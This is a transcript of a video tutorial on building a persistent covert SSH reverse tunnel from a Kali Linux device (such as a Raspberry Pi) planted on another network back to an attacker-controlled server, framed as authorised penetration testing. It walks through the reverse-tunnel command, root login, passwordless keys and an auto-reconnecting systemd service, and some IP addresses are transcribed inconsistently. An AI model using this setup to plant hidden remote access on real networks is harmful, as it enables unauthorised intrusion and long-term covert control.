Welcome to Career Pathways. My name is Don Bowers, and in this video, we're going to use a copy of Kali 2016.1, and we're going to create a TCP Reverse Shell back to a remote system, or make a remote system talk back to an attacker system. I was sitting in my classroom thinking one day, wouldn't it be great if we could take something like the Raspberry Pi, for example, and put a copy of Kali Linux on that Raspberry? And for those of you who don't know, we can actually do that, and it's really pretty simple to do. I will have a video out on that shortly. Once we do that, wouldn't it be great if we could take that small $35 device and place it on somebody's network, plug it into their network, plug it into some USB or other power supply, go back to my home server, type in a command and actually access that remote Raspberry Pi? Well, long and involved, we actually have now done that. Not only in proof of concept, but I have a Raspberry Pi sitting at home. I've actually put it on a couple of other networks, and as soon as I bring that up, I can go back to the server in my server room. I can type in one command and have full remote access with a full copy of Kali Linux running on somebody else's network, of course, for penetration testing. So this actually puts my hacking tools, my penetration testing tools, if you will, right on somebody else's network. And it's very cool. This is more of an advanced video, so and it's not hard, but there are some steps you need to do. I'm going to cover those steps. So first thing we'll do is we're going to go ahead and create a remote and attacker copy of Kali Linux. I'll be using VMware. When I initially configure these, I really like to have them on the same network because it's just easier. It doesn't really matter where these go. Well, I'll show you guys how to configure this so you can pretty much put it anywhere. We'll talk about those concepts. I need to prepare both systems for the TCP Reverse Shell connection. So there's modifications I'll need to do on both systems that are actually the same. And then I'll need to go to each system and make the connection and test it first. So I want to make sure this actually works. So we'll do all this kind of manually. Then we're going to actually automate the process for remote insertion. So we'll take everything we've done, we'll put a file together that the basic will start as a service. We'll get that up and running. We'll make it persistent so it always runs, and we will actually pass some keys to both systems. That way, there's no authentication happens automatically. There's no login for you at all. It'll just run and everything will be good. So I'm going to show you how to do all this. So with that said, let's go ahead and get started creating a reverse TCP shell on a remote and attacker penetration testing type system. So here we are as promised. I have two copies of Kali Linux. One is the remote system, and that's the one with Ninja Guy here, off of a very popular movie lately. And the other one is actually my attacker machine, and I call this the hacker or attacker machine. This is the machine that I would put back in a server room somewhere or behind some firewall that I manage. And the whole idea is to get the remote machine to talk back to this machine for, again, penetration testing purpose only, as always. So I want to show you how to do this, and we'll need to make modifications actually to both systems. It really doesn't matter which one I start with. So the first thing I need to do is I'm going to go to my command prompt, and I want to just double check the IP address on both systems. The IP address on this particular system is 172.32.24, and on my penetration testing system, the IP address is 172.30.2.139. And it's important to make sure you remember what those IP addresses are. Again, I'm going to go ahead and configure these on the same system, and we'll get them to work, and then really you could put this anywhere you want, and I'll talk about where you actually specify that in the files with the system. So let me go ahead and go back now to the remote system. I'm going to do a clear screen, and I'm going to begin this process of modifying these files. So on both machines, I need to make a couple changes to some files. So there is a file called SSH config I need to modify. So I'm going to do an ls. You see I'm in the root folder. I'm going to go to cd ... puts me back in the system root as opposed to the user root. I'm going to type in cd etc and cd.ssh. So it's in the etc ssh directory. I'm going to type in gedit, and I'm going to type in SSH underscore config, sorry, SSHD, excuse me, underscore config, and here's the file. Now, what I want to do first is I want to go here and change the port to port 8888, and this really could be any port. We could use, for example, port 443, which would make this an overt channel. Instead, we're going to use a covert channel, which is going to be 8888. And let me hit my numlock key as always, 8888. And again, we then need to, so we'll do this on both systems. Then we need to go down to, and let me turn on line numbering because it's actually just easier to do, and I forgot to do that. I apologize. Let me just go ahead and click on line numbering. And I want to go down to line 28. And on line 28, this is the default. I simply want to back this prohibit password because I actually do want to connect. I'm going to put yes. And then down at the very bottom, I'm going to add a new command that says gateway ports yes. So I want to be able to leverage this command in this file. That's all the changes I need to make to this particular file. The only other change that you might want to look for is there is a command up here at the very top that talks about X11 login being available, and the answer is always yes on this file by default, so I don't need to worry about that one. That was in my notes to check, and it just seems to always be set correctly. What X11 allows us to do, just for those of you who don't know, it allows me not only to connect remotely from one machine to another, but it also lets me run graphic programs across that network as well. So, for example, if I'm on the attacker machine and the remote system connects, I can go to the remote system and I can run Wireshark, for example, and we'll push that graphics back through the network using the X11 VNC program. So very cool, and that's already set up and ready to go by default. So I'm going to go ahead and click OK on this. And by the way, I think during the installation I did need to install X11. These are my default installations. So if you've not done an apt-get install X11 VNC, you actually might need to do that to get this to work. I guess I'm sorry, I just assume everybody has that installed because it's one of my core packages. So again, it's apt-get, apt-get space install X11 VNC, and then that will install the VNC program for you automatically. Okay, so it really is easy to work with, and if you haven't done that, you can just see one of my previous videos on setting up and configuring Kali Linux, and that will of course be in that configuration as well. So that's done on the remote system. I need to do exactly the same thing on the attacker system, or the penetration testing system, or the server system we might call it. So I'll clear the screen here. I'll do a cd ... I'll do a cd etc, I'll do a cd ssh, and I will do a gedit ssh d underscore config. And again, I'll turn on line numbering because I probably forgot to do that, and I typically do, but these are brand new installs, so let me just fix that because it's just easier for me, and of course if it's easier for me, it's going to be easier for you, right? All right, so I'm going to go ahead again. I'm going to put 888 here. And again, I'll need to press the numlock key. And I'm going to go down to line 28. I'm going to take this out. I'm just putting the word yes. And I'm going to go down to the very bottom of the file. I'm going to go ahead and put in the command gateway ports yes. And I'm going to go ahead and save this. Now, on both systems, I also need to make sure that the SSH command is running on both. So here I am on the penetration testing machine. I'm going to go back and I'm going to go ahead and type system ctl start SSH. And if I get a response back that just is the next line feed, that means the system did start. What I really want to do is enable this so it starts automatically, but I always make sure I start with the system control start command first. That way I know that I've got the right server starting. So I'm going to go ahead and do that command again. I'm going to type in enable because I want that to always run. Okay, and now we see that it's always running. So that's got that one taken care of. Go ahead and clear the screen here. I'm going to go back to the remote system and I'm going to do exactly the same thing there. I'm going to type in SSH, I'm sorry, how about that? System, CTL. And if you're not familiar with that command, just by the way, you can type in service SSH start. This is the newer way we're kind of doing things in Kali. I actually like it a little bit better. So we want to use this one instead. So system CTL is the command, start, and then we'll type in SSH. And again, I'm going to go ahead and also enable that. This allows us to have this automatically start whenever the machine starts. And there that is also. Now, really, on the next couple commands are actually pretty straightforward, really. What I need to do is I need to start a port forward and a connect to my other system. So in order to do that, now that I have the SSH service running, I'm going to test this out before I hard code everything. I'm going to type in SSH minus capital N minus capital R. These commands, if you look at the man page, both have to do with port forwarding and the way ports get forwarded. Now I'm going to actually forward over to port 8889. Now remember, we opened the ports 8888, but this has to kind of make a round robin to my other system, and so I need to open up 2 ports for this connection to go for a full circle. So I'm going to open up just one, either up or down, it doesn't matter. I chose 8889, and on my firewall back in my server room, this is the port I actually have open, is port 8889. Okay, so I'm going to go ahead and do that. I'm going to type in a colon, no space, localhost, colon 8888. So I need both of those. Then I'm going to type in another command called root at, and here's where I either put in the IP address or the DNS name of where I want to go. All right. And actually, I misled you a little bit. Port 8889 is, I still need to go out that, but what I have open on in my server room is actually port 8888. But I have to open up 2 ports to get the connection to happen. So this is the only time we really use port 8889. Again, just needs to be one off. So we're going to be going out port 8888 to actually make the connection. So here's where we do the root at. And if I were going to, for example, securesavvy.com, or someplace like that, then that's where I would type in right here. But I'm just going to go to a local IP right here. Again, this is just for local testing. So I'm going to type in the IP address of my attacker machine again, which was 172.32.139. And then I'll do a space minus P again. And what I want to do is I want to come in to port 8888. Okay, that's really all there is to this command. Now what's going to happen hopefully when I press the enter key is, well, let's press the enter key and find out. It's going to come back and ask me if I really want to make the connection, and I'm going to say yes, and you do have to type in yes. It's going to ask for the password. The password of course is Tor. It wants the password of the machine. I'm going to hit enter, and if the cursor drops down and just blinks, what that typically means is you actually have a connection now. So the connection is actually active on the remote system. So now let's go ahead and go over to the attacker or the control system, and we have to type in a command there, and it really is one command is all we need to do. It's SSH, you guessed it, minus capital X minus L root space minus P 8889 space localhost. And that's all we really have to do. We're going to hit enter. Hopefully it's going to go back up and ask if we want to connect. We're going to type in yes. It wants the password. And folks, we now have a connection. And so how do I know? Watch this. Remember, I'm on the remote system. I'm sorry, I'm on the hacker system. The hacker system IP address is 172.30.139, but if I do an ifconfig, look what IP address we have now, 172.30.2.24. Remember, that particular IP address is the remote system. It's the system I'd put on somebody else's network. So for example, if I were to go rogue and type in Wireshark, see, well, nothing's happening. Well, it just did, but it's happening on the remote system. So guys, I now have Wireshark running on the remote system on somebody else's network. And I can punch right through a firewall if as long as they aren't actually monitoring ports. And of course, the cool thing about this is going to be an encrypted connection, so they're going to see traffic going out port 8888 if they're monitoring it. If they're not monitoring it, you're not going to worry about it, right? It's going to be encrypted. All right, so this allows full remote access, and again, and we're going to go ahead and prove this as I bring this back up and do an ifconfig. You see, I'm still logged in remotely. Now, if I go to the remote system and I break this connection, which I'm going to do by pressing Control C, okay, and again, I'll do an ipconfig here. ifconfig, excuse me. I'm used to Windows, of course. And here we have this local IP address. Now if I go back over here to the attacker machine, the connection has now been broken. You see, and I get the old IP address of 172.30.2.139. So the connection was indeed successful. So when I come back in this next section, I'm going to talk to you about how to make this thing persistent. Now that we know that we can do it, we know that everything is working, and this is possible. The next thing we need to do is we may need to make this persistent so that when I bring my Raspberry Pi or smaller computer and put it on somebody else's network, I turn it on, even though I haven't logged into the system, this actually comes back and reports back to Mama, reports back to me on my penetration testing system, so I can actually begin the penetration test inside their network. So I will be back momentarily. Welcome back. As you can see, I'm on the remote system now, and there's several things we need to do. And I want to actually start with the attack system, or the control system as I call it, the one that's going to be back in somebody's server room somewhere that you're going to leverage the attack from. So this is the attacker system. I need to modify a couple files. And this is actually the easier of the two. We're going to do the exact same modification to both of these systems to begin with. It's kind of like how we started before where we modified both systems. We're doing the same thing now, but now the goal is, of course, just to make this thing persistent. So to do that, I need to modify the SSH socket config file. So I'm going to go ahead and drop to a command prompt, and I'm going to go ahead and do a cd / and hit return twice. This will bring me back to my home folder. I just find it easier to do that. So I'm going to do a cd .. cd lib, cd system d, and a cd system. And there's a bunch of files in here, as you can see. We want to actually do a modification, so I'm going to do gedit of the SSH underscore sockets. I'm sorry, it's not underscore on this one, it's actually period sockets file. And all I need to do is change this port number to, you guessed it, 8888. I did not see what was there. I'm going to close this without saving it because I do not want to make that change. Let me just go back in again. I couldn't remember whether that had an equals or not, and I hit the key twice, one too many times. So there we go. And there is an equals there. So 8888 is what you want. I'm going to hit save, and I will get out of this particular program. So that's been done. Now I need to make sure this starts automatically. So I'm going to do a system, CTL, start, SSH.socket, and it started, and then I'm going to go ahead and do it in enable. Again, I kind of do those almost always in concert because I want to make sure I have the right service. I've done a service start before and had the wrong service, and it was to not because obviously there was no service. So that really is pretty simple. So the next thing I need to do is I need to actually generate a key so these two can talk in an encrypted manner and automatically authenticate. Now here's the deal on this one. If you're using Kali version 2, you can just type in the command SSH keygen, hit enter, and do it. On this particular copy of Kali, you really need to use the RSA key pair, and that's important because it's a better key sequence. So I'm going to type in SSH keygen -t space RSA. And all you need to do is hit enter. You don't have to put a file name. It has one that's defaulting. Everything else is default. Don't need a passphrase. And now the key has indeed been generated. Then I need to send this key over to the remote system. Remember, the remote system's IP address was 172.32.24. So I'm going to type in the command SSH-copy-ID. On this, I also need to specify the port, so -P, port 8888, space, and the IP address of 172.32.24. I'm going to hit enter. It's going to come up and ask me if I want to make a connection. I say yes. I'm going to type in YES. Just a Y will not do here. And it wants the password. And the key has now been copied. Isn't that cool? So what I just did is, as I just told my remote system about, I just sent the key from my attacker system to the remote system so it can start to communicate. And that's actually all I need to do here on the what I call mama, or the control system. Now I need to make the same basic modifications to the other system, plus I need to enable a new service that we have connected through a config file. So let me just do a clear screen here. And in fact, I'm going to go ahead and press the up arrow key. Remember that command we typed in a while ago? That, and I know it's a few commands up. Remember this command, SSH -X, actually -X, -L root port 8889 localhost. We're going to issue, this is the command we'll issue when we want to actually talk to that remote system. The remote system is going to make the connection, and it's going to always have the connection. As long as it's up and running, the connection will be there. This command here just says, okay, I'm ready to talk, and let's get to talking. So I'm just going to leave that right there. I don't need to do anything else. So we're going to come back to that here in a minute. Now, on the remote system, we need to do some things as well. So I'm going to go ahead and type in cd / to make sure we get all the way back to root. I'm going to type in cd ... cd lib cd system d cd system. And here I'm going to actually, again, there's all those files. I'm going to go to gedit. I'm going to type in ssh.socket. I'm going to modify that file, and again we need to put port 888 here, and I'm going to save it. I wish this had a confirmation that things got saved. I know they do, but I just, one of those things I wish but probably would never get. Then I need to actually go ahead and run this command as a service. So I'm going to type in system CTL start ssh.socket. And again, I'm going to do an enable. That way it'll run automatically at startup. So that's working. The next thing I need to do again is I need to go ahead and generate the key pair going back to the directions. So we're going to type in SSH -keygen -t RSA, hit enter, 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 enter. Now our key pair has been generated, so now we'll do the copy. Sorry, excuse me, SSH -copy -ID space. We're going to need the port number, so we'll do a -P 8888 space, and then we need the IP address of 172.32. This one is going to be 139. Remember, now we're sending this back to the attacker's system, and so we need to make sure that we have the correct IP there. So I'm going to hit enter. It's going to come back and ask me for the password. And there we have the connection established. The key has now been sent. That's very good news, right? All right. Let's do a clear screen. Now we need to do a couple of other things. I need to place two files in this lib systemd system directory, and I've actually loaded those over in my documents folder under root. So if I type in cp /root /documents /ssh underscore get the right key sequence here would always help, right? It's not there, I'm sorry. It's in documents, not downloads. There we go. And it's called SSH underscore config.sh. And I'm just going to, want to copy to this current location. So if I just put a period / I don't need to type the entire path since I'm already there. And now that file's been copied, I'm going to do exactly the same thing here. I'm going to just, instead of doing this particular file, I'm going to do SSH service connect. Let me go ahead and back this out also because it needs to see everything. SSH underscore, I think it's service connect. Yep, connect service. There we go. So this file is the actual service. So let me explain what this does. The second one I'm doing here, the connect.service, is actually the service, and it's going to, all it does is call the connect.ssh. Very cool, right? Okay, so we'll do this again to a /, and now those files have indeed been copied. So I want to now modify one of those files, okay? And I want to actually look at both of them. So I'm going to go to gedit, and I will probably put these up on my website, but I'm going to leave them here. You're going to be able to see them in their entirety. So you can stop the video if you need to and just take a copy of Notepad or whatever and copy the files over if you want. Let's go ahead and do the SSH connect. And here's the file. And this one may be a little bit, there's a lot here. What I want to do though is I want to modify, and some of these commands should look pretty familiar. So this is going to start, and this file actually, it's a very cool script. What it does is it not only starts the connection, but it's going to automatically restart it. If it doesn't see a connection, it will restart it, and it checks about every, I think, 10 minutes or so. So it's very cool. But where you want to change this file is down here on line 18. This command should look really familiar. SSH capital N -R, again, port forwarding 8889 : localhost : 8888. Remember the root at. This one I originally did for my Raspberry Pi. In this particular scenario, we're going to have to put the IP address of 172.30.139. However, if you were going to take, again, now we're on the remote system, right? So if you were going to take this and forward it back to a system out across the internet, you would need to put the domain name or the static IP address and the port number you want to go through whatever firewall you're going through to get access. Does that make sense? Hopefully that does, because that's what I did here. This is a remote system. I can plug it in any network I want. If I go back to www.secureserve.com and port 8888, I will actually have access to the hacking system, or the what we call MAMA, or the control system on my server in my server room. So for now, we're going to modify this. We're going to put in 172.30.139 and a space. That's all the modifications we need to do. So this file is absolutely critical to what we're doing. So you may want to copy this down, copy all the commands down. Let me show you all of them. So you can now pause the video if you want, and you can make this a little bit bigger. You can pause the video if you wish, and you can copy this whole thing down, or hopefully at some point I'll have it on my website. But here it is, and this is the one that kind of controls the automation. I want to look at the other file, so let's go ahead and save this. And that other file was connect service. Now I just want to take a look at that real quickly, because this is the file that, of course, so you can copy it, but this is the file that allows this to be a service. So just a key hint, you could take any script you want, you can use this type of file, you end it with dot, well, this is called connect.service, you end it with the word service, and then you can automatically start this as a service. And all this file does is call SSH SSH_connect.sh. So this is kind of a good one to have around, let you automate a lot of tasks. I want to thank one of my students. Again, I don't know that he wants to be mentioned by name. He's the one that actually went out and grabbed these scripts and modified them to work in our particular environment. So thank you to my student who put this together and brought it back to me. Of course, I'm getting the honor and the glory because I'm doing the video. He doesn't do videos. And again, I don't know if he wants me to mention his name or not, because this is going to be out on the internet. So again, thank you to one of my students. So I don't need to do anything with that. What I really need to do now is just start that service automatically. So I'll do a system CTL start SSH underscore connect service. I'll hit enter. You see that that's started. I can also do an enable now and make sure this thing starts at boot up. Now I believe, folks, that is all we really have to do to get this thing to run. So now all we need to do is reboot this system and test it out. So I'm just going to go ahead and type in a reboot. We're going to let this reboot. Now again, the only command I should have to type in now is the command that is on my attacker system. I've already got it poised and ready to start. So I'm not going to go away from this screen. I want you to make sure you understand I've done nothing more to this system now. Hopefully with that script, making sure the key pairs work, you can see now it's actually waiting for a login. So if I were to take this system, maybe the system is a Raspberry Pi or one of the other smaller systems you can get to run on pretty much anything, and it's a copy of Kali, I can put this on somebody else's network, plug it in, walk away. It's a $35 device, right? No big deal. When I come over to this other system now, and I type in this command, it should have automatically attached. Now, if I do, again, an if config, I should have the remote system's IP address. And look at there, I do, 172.30.2.24. Again, that's my remote system, guys. And I haven't even logged into the remote system. Everything's running as a service. So all I have to do is plug that into somebody's network and I'm good to go. So now I can again type in Wireshark, for example, and I can execute that command, and there it is. Wireshark is now up and running on their system. Or I can type in Fern, or I can type in Social Engineering Toolkit, or I can type in Armitage, or whatever I want to type in to begin accessing the system. There's Firefox, so I can actually run my GUI stuff right back through the system, and I'll get the GUI representation on my attacking system. That's how easy that is. So again, copy those two config files over. You've now seen the configuration of these things. It really is doable. It's not that hard. You know, probably a lot harder for us to figure out how to do it than it is for you to actually do it. I hope that works for you as well as it's worked for me. I'm absolutely having a blast doing this. I've put my Raspberry Pi on several systems with permission, of course, and signed documentation just to see how well this thing works, and it works really well. It's really consistent, and I can come back into my server-side system, my attacker system, anytime I want. I can go to Kali. I can type in this one command. Again, there's just this one command. And I can have access. Now, if I want to break the connection, I can do one of two things. I can just reboot the master system here, the mama or the attacker system, because the one that's or I can reboot the remote system, I suppose. Since I have access, well, I really don't have access. I can just type in the reboot command, and it will reboot the remote system. It will not reboot this attacker system. Let me try it. And it says the connection was closed. Let's see what happens over here. And you can see this thing is rebooting. How cool is that? So I'm able to reboot the remote system remotely, of course. And now as this thing's rebooting, I come back over here to the hacker system. I do an IP or an IF config. And you see I have back the old IP address of 172.30.2.139. And again, if I go up and type in this command again, once my remote system reboots, there it is. It is rebooted. Now I can type in this command again, and I now have access to that remote system. Once again, I'm online and ready to do a penetration test on that network. So that's going to conclude this video. I hope you've enjoyed watching it as much as I've enjoyed giving it to you, and I will see you guys in the next video from Career Pathways.